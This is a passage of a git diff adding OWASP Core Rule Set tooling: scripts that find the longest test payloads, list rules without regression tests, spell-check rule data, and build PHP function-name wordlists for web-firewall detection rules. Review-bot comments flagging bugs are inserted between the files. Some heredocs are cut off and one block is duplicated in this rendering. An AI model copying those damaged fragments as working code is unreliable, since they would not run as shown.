a['file'] = f + a['title'] = "unset TX variable" + errmsgf(a) + retval = 1 + ### check new unlisted tags + c.check_tags(f, tags) + if len(c.newtags) == 0: + msg(" No new tags added.") + else: + errmsg(" There are one or more new tag(s).") + for a in c.newtags: + a['indent'] = 2 + a['file'] = f + a['title'] = "new unlisted tag" + errmsgf(a) + retval = 1 + msg("End of checking parsed rules") + msg("Cumulated report about unused TX variables") + has_unused = False + for tk in txvars: + if txvars[tk]['used'] == False: + if has_unused == False: + msg(" Unused TX variable(s):") + a = txvars[tk] + a['indent'] = 2 + a['title'] = "unused TX variable" + a['message'] = "unused variable: %s" % (tk) + errmsgf(a) + retval = 1 + has_unused = True + + if has_unused == False: + msg(" No unused TX variable") + + sys.exit(retval) diff --git a/util/find-max-datalen-in-tests/README.md b/util/find-max-datalen-in-tests/README.md new file mode 100644 index 0000000000..8f2dcd8b31 --- /dev/null +++ b/util/find-max-datalen-in-tests/README.md 
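Review bot: `check_ignore_case` calls `self.store_error("Invalid action", a['act_name'])` and `self.store_error("Invalid ctl", a['act_arg'])` with two arguments while `store_error(self, msg)` accepts one, so an unknown action or ctl makes the checker die with a TypeError instead of reporting it; even with the call fixed, the unguarded `self.actionsl.index(...)` / `self.ctlsl.index(...)` / `self.transformsl.index(...)` / `self.operatorsl.index(...)` on the following line raises ValueError for the same input. Each validity check should format the name into the message and turn the case-mismatch check into an `elif`, as below (the same shape applies to the `t:` and operator branches). Separately, the bare `except:` clauses around the tag-list load and the file reads hide the real exception and also swallow KeyboardInterrupt; `except OSError as e:` with `e` in the message is what an operator needs to act on. `self.re_tx_var` is compiled but never used and can be dropped.

```python
                # … unchanged: id / chain bookkeeping …
                if a['act_name'].lower() not in self.actionsl:
                    self.store_error("Invalid action: %s" % a['act_name'])
                elif self.actions[self.actionsl.index(a['act_name'].lower())] != a['act_name']:
                    self.store_error("Action case mismatch: %s" % a['act_name'])

                if a['act_name'] == 'ctl':
                    if a['act_arg'].lower() not in self.ctlsl:
                        self.store_error("Invalid ctl: %s" % a['act_arg'])
                    elif self.ctls[self.ctlsl.index(a['act_arg'].lower())] != a['act_arg']:
                        self.store_error("Ctl case mismatch: %s" % a['act_arg'])
                # … unchanged: same if/elif pattern for 't' and for the operator check …
```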
@@ -0,0 +1,47 @@ +# Find the longest data in CRS test cases + +This page describes how can you find the longest data string in CRS test cases. + +## Goals + +Some rules check the `FILES_COMBINED_SIZE` against the `TX:COMBINED_FILE_SIZES` variable. To check these work as well, we need to set the `tx.combined_file_sizes` variable and send a payload which is greater than this value - see [this](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/tests/regression/README.md#requirements): + +``` +SecAction "id:900005,\ + phase:1,\ + nolog,\ + pass,\ + ctl:ruleEngine=DetectionOnly,\ + ctl:ruleRemoveById=910000,\ + setvar:tx.blocking_paranoia_level=4,\ + setvar:tx.crs_validate_utf8_encoding=1,\ + setvar:tx.arg_name_length=100,\ + setvar:tx.arg_length=400,\ + setvar:tx.combined_file_sizes=MAX_LEN" +``` + +In `modsecurity-crs-docker` [here](https://github.com/coreruleset/modsecurity-crs-docker/blob/master/src/opt/modsecurity/activate-rules.sh#L79-L82) is how the setting works. + +To configure the Github action, you need to set up this in CORERULESET/test/docker-compose.yaml: + +``` + ... + COMBINED_FILE_SIZES=MAX_LEN + ... +``` + +## Usage + +To find the possible value of MAX_LEN, run this script with one mandatory, and one optional argument. The mandatory argument is the path of the CRS directory (the root). The optional argument is the `-i` or `--ignoretests`, where you can pass the test id what you want to skip - eg. you want to use the test to exceed the maximum length. + +``` +./find_max_datalen.py ../.. -i 920410-1 +``` + +In this case, you pass the CRS root as parent dir, and skip the test id 920410-1, which wants to exceed the maximum length. + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* CRS rule set diff --git a/util/find-max-datalen-in-tests/find_max_datalen.py b/util/find-max-datalen-in-tests/find_max_datalen.py new file mode 100755 index 0000000000..aab66ac76d --- /dev/null +++ b/util/find-max-datalen-in-tests/find_max_datalen.py 
@@ -0,0 +1,69 @@ +#!/usr/bin/env python3 + +# This file helps to find the longest data size in all test cases under +# CORERULESET_ROOT/test/regression/tests directory. + +# You just have to pass the CORERULESET_ROOT as argument. +# Optional argument can be passed -i or --ignoretests - the listed test +# cases will skipped. + +# At the end, the script will print the longest length, and the rule where +# the data is. + + +import sys +import os +import os.path +import yaml +import argparse + +if __name__ == "__main__": + + desc = """This script needs a mandatory argument where you pass the path to your +coreruleset. Then it iterates through tests, and finds the longest request +body (data) between test cases. To ignore a test case, pass the number of the +test with '-i' or '--ignoretests', eg.: '... -i 920410-1'""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument('-i', '--ignoretests', metavar='ignoretests', + help='Ignore listed rules, separated by comma', required=False, + nargs=1) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + test_cases = {} + testpath = args.crspath.rstrip("/") + "/tests/regression/tests" + + if not os.path.isdir(testpath): + print("Directory does not exist: %s" % (testpath)) + sys.exit(1) + + ignoretests = [] + if args.ignoretests is not None: + ignoretests = args.ignoretests[0].split(",") + + try: + max_len = 0 + max_title = "" + for root, dirs, files in os.walk(testpath): + path = root.split(os.sep) + for file in files: + if file.endswith(".yaml"): + with open(os.path.join(root, file)) as f: + test = yaml.full_load(f) + for t in test['tests']: + title = t['test_title'] + for s in t['stages']: + if 'stage' in s: + if 'input' in s['stage']: + if 'data' in s['stage']['input']: + if len(s['stage']['input']['data']) > max_len \ + and title not in ignoretests: + max_len = 
len(s['stage']['input']['data']) + max_title = title + print("Longest data: %d in test %s" % (max_len, max_title)) + except: + print("Can't open files in given path!") + print(sys.exc_info()) + sys.exit(1) diff --git a/util/find-rules-without-test/README.md b/util/find-rules-without-test/README.md new file mode 100644 index 0000000000..faf8ed3054 --- /dev/null +++ b/util/find-rules-without-test/README.md @@ -0,0 +1,36 @@ +# Find the rules without test cases + +This page describes how can you find the rules without any test cases + +## Goal + +The main goal is that we must have at least one regression test for all relevant REQUEST- * rules. (In this context, the PL control rules are not relevant, because they do not need to have tests.) + +You need to pass the CORERULESET_ROOT as argument, eg: +``` +util/find-rules-without-test/find-rules-without-test.py /path/to/coreruleset +``` + +Optionally you can pass the argument `--output=github` or `--output=native`. The last one is the default. + +The script collects all available test files, based on the name of the test files. It will look up under CORERULESET_ROOT/tests/regression/tests/*. + +Then it starts to read all rule files with name "REQUEST-\*", which means this won't handle the RESPONSE-* rules. + +The script parses the rules, uses `msc_pyparser`, reads the rule's id, and tries to find the test case. + +The sctipt ignores the check in case of PL control rules (rules with id under 9XX100), and some hardcoded rules: + * REQUEST-900- + * REQUEST-901- + * REQUEST-905- + * REQUEST-910- + * REQUEST-912. + * REQUEST-949- + + +## Prerequisites + +* Python3 interpreter +* Py-YAML +* msc_pyparser +* CRS rule set diff --git a/util/find-rules-without-test/find-rules-without-test.py b/util/find-rules-without-test/find-rules-without-test.py new file mode 100755 index 0000000000..5ee9c00ec4 --- /dev/null +++ b/util/find-rules-without-test/find-rules-without-test.py 
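Review bot: The bare `except:` around the whole `os.walk` loop reports every failure as "Can't open files in given path!", including a `KeyError` from a test file that lacks `tests`, `test_title` or `stages`, and it also swallows `SystemExit` and `KeyboardInterrupt`; narrow it to `except (OSError, yaml.YAMLError, KeyError, TypeError) as e:` and print `e` instead of `sys.exc_info()`. The loader on `test = yaml.full_load(f)` should be `yaml.safe_load(f)`: the test files are plain mappings and the full loader constructs Python object types that plain data never needs. `path = root.split(os.sep)` is assigned and never read and can be dropped.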
@@ -0,0 +1,137 @@ +#!/usr/bin/env python3 + +# This file helps to find the rules which does not have any test cases. +# +# You just have to pass the CORERULESET_ROOT as argument. +# +# At the end, the script will print the list of rules without any tests. +# +# Please note, that there are some exclusions: +# * only REQUEST-NNN rules are checked +# * there are some hardcoded exlucions: +# * REQUEST-900- +# * REQUEST-901- +# * REQUEST-905- +# * REQUEST-910- +# * REQUEST-912. +# * REQUEST-949- +# +# and the rule 921170 + +import sys +import glob +import msc_pyparser +import argparse + +EXCLUSION_LIST = ["900", "901", "905", "910", "912", "949", "921170", "942441", "942442"] +oformat = "native" + +def find_ids(s, test_cases): + """ + s: the parsed structure + test_cases: all available test cases + """ + rids = {} + for i in s: + # only SecRule counts + if i['type'] == "SecRule": + for a in i['actions']: + # find the `id` action + if a['act_name'] == "id": + # get the argument of the action + rid = int(a['act_arg']) # int + srid = a['act_arg'] # string + if (rid%1000) >= 100: # skip the PL control rules + # also skip these hardcoded rules + need_check = True + for excl in EXCLUSION_LIST: + if srid[:len(excl)] == excl: + need_check = False + if need_check: + # if there is no test cases, just print it + if rid not in test_cases: + rids[rid] = a['lineno'] + return rids + +def errmsgf(msg): + if oformat == "github": + print("::error file={file},line={line},endLine={endLine},title={title}::{message}".format(**msg)) + else: + print("file={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg)) + +if __name__ == "__main__": + + desc = """This script helps to find the rules without test cases. It needs a mandatory +argument where you pass the path to your coreruleset. The tool collects the +tests with name REQUEST-*, but not with RESPONSE-*. Then reads the rule id's, +and check which rule does not have any test. 
Some rules does not need test +case, these are hardcoded as exclusions: 900NNN, 901NNN, 905NNN, 910NNN, +912NNN, 949NNN.""" + + parser = argparse.ArgumentParser(description=desc, formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument("--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument('crspath', metavar='/path/to/coreruleset', type=str, + help='Directory path to CRS') + args = parser.parse_args() + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + test_cases = {} + # from argument, build the rules path and regression test paths + crspath = args.crspath.rstrip("/") + "/rules/*.conf" + testpath = args.crspath.rstrip("/") + "/tests/regression/tests/*" + retval = 0 + # collect rules + flist = glob.glob(crspath) + flist.sort() + if len(flist) == 0: + print("Can't open files in given path!") + sys.exit(1) + + # collect test cases + tlist = glob.glob(testpath) + tlist.sort() + if len(tlist) == 0: + print("Can't open files in given path (%s)!" 
% (testpath)) + sys.exit(1) + # find the yaml files with name REQUEST at the begin + # collect them in a dictionary + for t in tlist: + tname = t.split("/")[-1] + if tname[:7] == "REQUEST": + testlist = glob.glob(t + "/*.yaml") + testlist.sort() + for tc in testlist: + tcname = tc.split("/")[-1].split(".")[0] + test_cases[int(tcname)] = 1 + + # iterate the rule files + for f in flist: + fname = f.split("/")[-1] + if fname[:7] == "REQUEST": + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + except: + print("Can't open file: %s" % f) + print(sys.exc_info()) + sys.exit(1) + + try: + # make a structure + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + # add the parsed structure to a function, which finds the 'id'-s, + # and the collected test cases + rids = find_ids(mparser.configlines, test_cases) + for k in rids.keys(): + errmsgf({'file': f, 'line': rids[k], 'endLine': rids[k], 'title': "Test file missing", 'message': ("rule %d does not have any regression test" % k)}) + except: + print("Can't parse config file: %s" % (f)) + print(sys.exc_info()[1]) + sys.exit(1) + sys.exit(retval) diff --git a/util/find-rules-without-test/requirements.txt b/util/find-rules-without-test/requirements.txt new file mode 100644 index 0000000000..a989487670 --- /dev/null +++ b/util/find-rules-without-test/requirements.txt @@ -0,0 +1 @@ +msc-pyparser>=1.2.1 diff --git a/util/fp-finder/english-extended.txt b/util/fp-finder/english-extended.txt new file mode 100644 index 0000000000..8a3c41b4a4 --- /dev/null +++ b/util/fp-finder/english-extended.txt @@ -0,0 +1,31 @@ +basename +checkdate +chroot +config +crypto +dir +exp +file_exists +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +idate +is_a +md5 +misc +ord +popen +prev +stat +substr +symlink +syslog +ucfirst +unlink +unset diff --git a/util/fp-finder/spell.sh b/util/fp-finder/spell.sh new file mode 100755 index 0000000000..2e5dde3d0a --- /dev/null 
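Review bot: `retval` is initialised to 0 and never changed, so the script exits 0 even after `errmsgf` has reported rules without tests, which makes the `--output github` annotations useless as a CI gate; set `retval = 1` inside the `for k in rids.keys():` loop. The bare `except:` around the `msc_pyparser` call also catches `SystemExit` and `KeyboardInterrupt` and hides the traceback behind `sys.exc_info()[1]`; `except Exception as e:` with `print(e)` is enough there. The header comment names only 921170 as an extra exclusion while `EXCLUSION_LIST` also carries 942441 and 942442, and the argparse description omits all three; the comment, the description and the list should agree.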
+++ b/util/fp-finder/spell.sh 
@@ -0,0 +1,163 @@ +#!/bin/bash + +# This program uses WordNet to find English words. The WordNet license: + +# WordNet Release 3.0 This software and database is being provided to you, +# the LICENSEE, by Princeton University under the following license. +# By obtaining, using and/or copying this software and database, you agree that you have read, +# understood, and will comply with these terms and conditions.: Permission to use, copy, +# modify and distribute this software and database and its documentation for any purpose and +# without fee or royalty is hereby granted, provided that you agree to comply with +# the following copyright notice and statements, including the disclaimer, and that the same +# appear on ALL copies of the software, database and documentation, including modifications +# that you make for internal use or for distribution. +# WordNet 3.0 Copyright 2006 by Princeton University. +# All rights reserved. +# THIS SOFTWARE AND DATABASE IS PROVIDED "AS IS" AND PRINCETON UNIVERSITY MAKES NO REPRESENTATIONS +# OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PRINCETON UNIVERSITY +# MAKES NO REPRESENTATIONS OR WARRANTIES OF MERCHANT- ABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE +# OR THAT THE USE OF THE LICENSED SOFTWARE, DATABASE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD +# PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS. +# The name of Princeton University or Princeton may not be used in advertising or publicity +# pertaining to distribution of the software and/or database. Title to copyright in this +# software, database and any associated documentation shall at all times remain with +# Princeton University and LICENSEE agrees to preserve same. + +if ! 
command -v wn > /dev/null 2>&1; then + cat < checking ${datafile_name}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + while read -r word; do + # wordnet exit code is equal to number of search results + if [ -n "${SUFFIX}" ]; then + word="$(sed -E "s/(.*)${SUFFIX}/\1/" <<<"${word}")" + fi + if ! grep -qE '^[A-Za-z]+$' <<<"${word}"; then + continue + fi + + if ! wn "${word}" >/dev/null 2>&1; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via wn: " + fi + echo "${word}" + else + if ${USE_EXTENDED}; then + # shellcheck disable=SC2046 + if [ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via extended list: " + fi + echo "${word}" + fi + fi + fi + done <<<"$(sort "${datafile}" | uniq)" + + if ! 
${MACHINE_READABLE}; then + echo "" + fi +} + +usage() { + cat < /dev/null && pwd ) +EXTENDED_WORDS_LIST_PATH="${SCRIPT_DIR}/english-extended.txt" +RULES_DIR="${SCRIPT_DIR}/../../rules/" + +MACHINE_READABLE=false +USE_EXTENDED=false + +POSITIONAL_ARGS=() +while [[ $# -gt 0 ]]; do + # shellcheck disable=SC2221,SC2222 + case $1 in + -m|--machine) + MACHINE_READABLE=true + shift + ;; + -e|--extended) + USE_EXTENDED=true + shift + ;; + -s|--suffix) + shift + SUFFIX="${1}" + shift + ;; + -h|--help) + usage + exit 1 + ;; + -*|--*) + if [ $# -eq 1 ]; then + POSITIONAL_ARGS+=("$1") # save positional arg + shift # past argument + else + echo "Unknown option $1" + usage + exit 1 + fi + ;; + *) + POSITIONAL_ARGS+=("$1") # save positional arg + shift + ;; + esac +done + +set -- "${POSITIONAL_ARGS[@]}" # restore positional parameters + + +if [ -n "${1}" ]; then + check "${1}" +else + for datafile in "${RULES_DIR}"*.data; do + check "${datafile}" + done +fi diff --git a/util/join-multiline-rules/join.py b/util/join-multiline-rules/join.py index 95c96c2b17..7a2fc4ce07 100755 --- a/util/join-multiline-rules/join.py +++ b/util/join-multiline-rules/join.py @@ -20,16 +20,16 @@ # # Example: # -# SecRule &TX:paranoia_level "@eq 0" \ +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" \ # "id:901120,\ # phase:1,\ # pass,\ # nolog,\ -# setvar:tx.paranoia_level=1" +# setvar:tx.blocking_paranoia_level=1" # # will be outputted as: # -# SecRule &TX:paranoia_level "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.paranoia_level=1" +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.blocking_paranoia_level=1" # import fileinput, sys diff --git a/util/php-dictionary-gen/php-dictionary-creator.sh b/util/php-dictionary-gen/php-dictionary-creator.sh new file mode 100755 index 0000000000..dcb0c55e75 --- /dev/null +++ b/util/php-dictionary-gen/php-dictionary-creator.sh 
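Review bot: The extended-list lookup `if [ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]` builds a regex from `word` and counts all matches only to compare the count with zero; `if grep -qxF -- "${word}" "${EXTENDED_WORDS_LIST_PATH}"; then` is an exact fixed-string line match, stops at the first hit and needs no shellcheck disable. In the same loop `sed -E "s/(.*)${SUFFIX}/\1/"` splices `SUFFIX` into a regex unescaped, so a suffix containing `.` or `+` acts as a pattern and the greedy `(.*)` removes the last occurrence anywhere in the word rather than a trailing suffix; if a literal trailing suffix is what is meant, `word="${word%"${SUFFIX}"}"` does that without a fork. The `local datafile="${1}"` / stdin-detection block appears twice inside `check()` in this rendering; if that is not an extraction artifact the second copy is dead repetition and should go. The heredocs in the `wn` check and in `usage()`, and the `SCRIPT_DIR` assignment, are garbled in this rendering and were not reviewed.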
@@ -0,0 +1,501 @@ +#!/bin/bash +# +# This is a utility script to create wordlists for later use by the +# OWASP ModSecurity Core Rule Set. +# +# The scripts extracts function names out of the PHP source code and +# filters them into different categories. +# + +IFS=$'\n\t' + +# -------------------------------------------------- +# Initialization +# -------------------------------------------------- + +VERBOSE=0 +ERROR=0 + +MYDATE=$(date +"%Y-%m-%d") +MYDATE_SECONDS=$(date +"%s") + +AGE_LIMIT=30 +FREQUENCY_LIMIT=90000 + +RULES="933150 933151 933161" +RULES_CMDLINE="" + +PHP_REPO="" +PHP_REPO_CMDLINE="" +PHP_REPO_GITHUB="https://github.com/php/php-src" + +SPELL_PATH="../fp-finder/spell.sh" +SPELL_PATH_CMDLINE="" + + +DEFAULT_PHP_FUNCTIONS_FREQUENCIES="./frequencylist.txt" +TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS=$(mktemp) +PHP_FUNCTIONS_FREQUENCIES_CMDLINE="" + +TMP_PHP_FUNCTIONS=$(mktemp) +TMP_ENGLISH_WORDS=$(mktemp) +TMP_PHP_FUNCTIONS_FREQUENT=$(mktemp) +TMP_PHP_FUNCTIONS_RARE=$(mktemp) +TMPDIR=$(mktemp -d) + +trap 'rm -rf $TMP_PHP_FUNCTIONS $TMP_PHP_FUNCTIONS_FREQUENT $TMP_PHP_FUNCTIONS_RARE $TMP_ENGLISH_WORDS $TMPDIR' INT TERM EXIT + +HIGH_RISK_FUNCTIONS_FILENAME="php-high-risk-functions.txt" + +R933160_FILENAME="933160.ra" +R933161_FILENAME="933161.ra" + +read -r -d '' TOOLCHAIN_PREFIX << 'EOF' +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. +EOF + +read -r -d '' R933161_PREFIX << 'EOF' +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) +EOF + +PHP_DICTIONARY_GEN_PREFIX="##! 
File autogenerated by util/php-dictionary-gen with:" + +R933150_FILENAME="php-function-names-933150.data" +R933151_FILENAME="php-function-names-933151.data" + +DATA_FILE_PATH="../../rules/" +RA_FILE_PATH="../../regex-assembly/" + +# -------------------------------------------------- +# Library Functions +# -------------------------------------------------- + +function usage { + + cat << EOF + +This is a utility script to create wordlists for later use by the +OWASP ModSecurity Core Rule Set. + +Usage: + +$> $(basename "$0") [options] + +Options: + + -a --agelimit STR Age in days before frequency is retrieved anew from github + Only makes sense when used together with frequencylist + Default: $AGE_LIMIT + -h --help Print help text and exit. + -f --frequencylist STR File with frequencies of PHP function usage on github + Default: $DEFAULT_PHP_FUNCTIONS_FREQUENCIES + -F --frequencylimit STR Minimum number of occurrences in GitHub repo to qualify for base rule + Functions not meeting this limit will be added to stricter sibling + Default: $FREQUENCY_LIMIT + -p --phprepo STR Path to PHP repository. Optional. + -r --rules STR Space separated list of rules to cover. + Rules available: + * 933150 + * 933151 + * 933161 + Default: "$RULES" + -s --spell STR Path of spell.sh script. + Default: $SPELL_PATH + -v --verbose Verbose output + + +Filter Architecture +------------------- +See discussion at +https://github.com/coreruleset/coreruleset/pull/3228#issuecomment-1594813466 + +Input: Function list out of PHP source code + +Filter 1: Is the function name an English word? +If yes: Add to source for rule 933161 +If no: Continue +Filter 2: Is the function name frequently used on GitHub (across all PHP repos)? +If yes: Add to word list for 933150 +If no: Add to word list for 933151 + +Please note that rules 933150 and 933151 are parallel match rules. So the +output of this script is the parallel match file for these rules. 
+ +Rule 933161 is a regular expression rule, though, so the output of this +script is the source file for the CRS toolchain. + +EOF + + exit 0 +} + +function break_on_error { + if [ "$1" -ne 0 ]; then + echo + if [ -n "$2" ]; then + echo -e "$2" + fi + echo "FAILED. This is fatal. Aborting" + exit 1 + fi +} + + +function get_frequency { + NUM="" + N=0 + + until [ -n "$NUM" ] || [ $N -gt 4 ]; do + N=$((N + 1)) + + CURL_OUTPUT=$(curl -v \ + --header "X-GitHub-Api-Version: 2022-11-28" \ + --header "Accept: application/vnd.github+json" \ + --header "Authorization: Bearer $GITHUB_TOKEN" \ + "https://api.github.com/search/code?q=$1+language:php&type=Code&per_page=1" 2>&1) + + NUM=$(echo "$CURL_OUTPUT" | grep "total_count" | grep -o -E "[0-9]*") + + if [ -z "$NUM" ]; then + >&2 echo -n " Curl call for $1 failed." + if [ "$(echo "$CURL_OUTPUT" | grep -c "x-ratelimit-remaining: 0")" -eq 1 ]; then + >&2 echo -n " Hitted rate limit. Waiting..." + # 50 is the number of seconds to wait for the rate limit to be reset to 10 + # /search/code endpoint is limited to 10 requests per minute. + # See https://docs.github.com/en/rest/search/search?apiVersion=2022-11-28#search-code + sleep 25 + fi + >&2 echo " Trying again ($N)." 
+ fi + + sleep 1 + done + if [ -z "$NUM" ]; then + echo "- $1" >> "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + fi + echo "$NUM" +} + + +function vprint { + + if [ $VERBOSE -eq 1 ]; then + echo -e "$1" + fi +} + +# -------------------------------------------------- +# Parameter reading and checking +# -------------------------------------------------- + +while true +do + if [ -n "${1-}" ]; then + ARG="${1-}" + FIRSTCHAR="$(echo "$ARG " | cut -b1)" + # The space after $ARG makes sure CLI option "-e" (an echo option) is also accepted + if [ "$FIRSTCHAR" == "-" ]; then + case $1 in + -h) usage; exit;; + --help) usage; exit;; + -a) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + --agelimit) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + -f) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + --frequencylist) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + -F) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + --frequencylimit) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + -p) export PHP_REPO_CMDLINE="${2-}"; shift;; + --phprepo) export PHP_REPO_CMDLINE="${2-}"; shift;; + -r) export RULES_CMDLINE="${2-}"; shift;; + --rules) export RULES_CMDLINE="${2-}"; shift;; + -s) export SPELL_PATH_CMDLINE="${2-}"; shift;; + --spell) export SPELL_PATH_CMDLINE="${2-}"; shift;; + -v) export VERBOSE=1;; + --verbose) export VERBOSE=1;; + *) echo "Unknown option $1. This is fatal. Aborting."; exit 1;; + esac + if [ -n "${1-}" ]; then + shift + fi + else + break + fi + else + break + fi +done + +if [ -n "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + if [ ! -f "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + echo "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE is not existing. This is fatal. Aborting." + exit 1 + else + PHP_FUNCTIONS_FREQUENCIES=$PHP_FUNCTIONS_FREQUENCIES_CMDLINE + echo "Setting custom frequency list file: $PHP_FUNCTIONS_FREQUENCIES." 
+ fi +else + PHP_FUNCTIONS_FREQUENCIES=$DEFAULT_PHP_FUNCTIONS_FREQUENCIES + echo "Setting default frequency list file: $PHP_FUNCTIONS_FREQUENCIES." +fi + + +if [ -n "$PHP_REPO_CMDLINE" ]; then + if [ -d "$PHP_REPO_CMDLINE" ]; then + PHP_REPO="$PHP_REPO_CMDLINE" + else + echo "Path to PHP repository passed on command line is not existing. This is fatal. Aborting." + exit 1 + fi +fi + +if [ -n "$AGE_LIMIT_CMDLINE" ]; then + AGE_LIMIT="$AGE_LIMIT_CMDLINE" +fi + +if [ -n "$FREQUENCY_LIMIT_CMDLINE" ]; then + FREQUENCY_LIMIT="$FREQUENCY_LIMIT_CMDLINE" +fi + +# Adding parameters used by this run to the prefix that will be printed on the generated files. +PHP_DICTIONARY_GEN_PREFIX="$PHP_DICTIONARY_GEN_PREFIX -a $AGE_LIMIT -F $FREQUENCY_LIMIT -s $SPELL_PATH" + +if [ -n "$RULES_CMDLINE" ]; then + # Making sure the rules given on the cmd line can be accomodated for. + echo "$RULES_CMDLINE" | tr " " "\n" | while read -r RULE; do + echo "$RULE" | grep -E -q "^(933150|933151|933161)$" + if [ $? -ne 0 ]; then + echo "Rule $RULE is not available. This is fatal. Aborting." + exit + fi + done +fi + +if [ -n "$SPELL_PATH_CMDLINE" ]; then + if [ ! -x "$SPELL_PATH_CMDLINE" ]; then + echo "$SPELL_PATH_CMDLINE is not existing or is not executable. This is fatal. Aborting." + exit 1 + else + SPELL_PATH=$SPELL_PATH_CMDLINE + fi +fi + +# check if WordNet (wn) is installed +# We could also defer this test to spell.sh. But if done ourselves, we can +# control the error message and behavior. +if [ "$(command -v wn > /dev/null 2>&1 )" ]; then + cat </dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + PHP_REPO="$TMPDIR" +else + echo -n "Updating PHP repo ... 
" + PWD_SAVE=$(pwd) + cd $PHP_REPO || break_on_error 1 "Cannot cd to $PHP_REPO" + git checkout master >/dev/null 2>&1 + git pull --depth 1 >/dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + cd "$PWD_SAVE" || break_on_error 1 "Cannot cd back to $PWD_SAVE" +fi + +# Step 2 - Extract Function Names +echo -n "Extracting PHP function names ... " +# Strings containing "$" are excluded (E.g. "{$this->getDeclarationName") +grep -o --no-file -R 'ZEND_FUNCTION(.*)' "$PHP_REPO" | grep -v '\$' | cut -f2 -d\( | cut -f1 -d\) | sort | uniq > $TMP_PHP_FUNCTIONS +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR +echo "done ($(wc -l "$TMP_PHP_FUNCTIONS" | xargs echo | cut -d\ -f1 ) function names found)" + +# Step 3 - Filter 1: Is it an English word +echo -n "Extracting English words out of list of PHP function names ... " +$SPELL_PATH --machine --extended "$TMP_PHP_FUNCTIONS" > "$TMP_ENGLISH_WORDS" +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR "$(cat "$TMP_ENGLISH_WORDS")" +echo "done ($(wc -l "$TMP_ENGLISH_WORDS" | xargs echo | cut -d\ -f1 ) english words found)" +# Step 4 - Output 933161 +if [ "$DO_RULE_933161" == "1" ]; then + # Being 933161 a stricter sibling of 933160, 933160 entries are also added to 933161. + # We read the 933160 file skipping comments and empty lines. Entries are added to 933161 (if not already present). 
+ grep -v '^#' "$RA_FILE_PATH$R933160_FILENAME" | awk NF | while read -r R933160_ENTRY; do + + if [ $(grep -c -E "^$R933160_ENTRY$" "$TMP_ENGLISH_WORDS") -eq 0 ]; then + # we have to add this function to 933161 + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME added to the stricter sibling $R933161_FILENAME" + echo "$R933160_ENTRY" >> "$TMP_ENGLISH_WORDS" + else + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME already present in the stricter sibling $R933161_FILENAME" + fi + + done + + sort -o "$TMP_ENGLISH_WORDS" "$TMP_ENGLISH_WORDS" + echo -n "Writing output for rule 933161 to $R933161_FILENAME ... " + echo "$TOOLCHAIN_PREFIX" > $RA_FILE_PATH$R933161_FILENAME + echo -e "\n$PHP_DICTIONARY_GEN_PREFIX\n" >> $RA_FILE_PATH$R933161_FILENAME + echo "$R933161_PREFIX" >> $RA_FILE_PATH$R933161_FILENAME + # new line print is in a separate echo to avoid echoing the prefix without enabling interpretation of backslash escapes + echo -e -n "\n" >> $RA_FILE_PATH$R933161_FILENAME + cat "$TMP_ENGLISH_WORDS" >> $RA_FILE_PATH$R933161_FILENAME + echo "done" +fi + +# Step 5 - Create or update frequency list +echo "Creating / updating frequency list for functions (namely creating may take a while) ..." +sed -i -e "s/^/^/" -e "s/$/$/" "$TMP_ENGLISH_WORDS" +cat "$TMP_PHP_FUNCTIONS" | grep -v -E -f "$TMP_ENGLISH_WORDS" | while read -r FUNCTION; do + + grep -q -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" + if [ $? -ne 0 ]; then + # function name not found in frequency list + echo "Function $FUNCTION not found in frequency 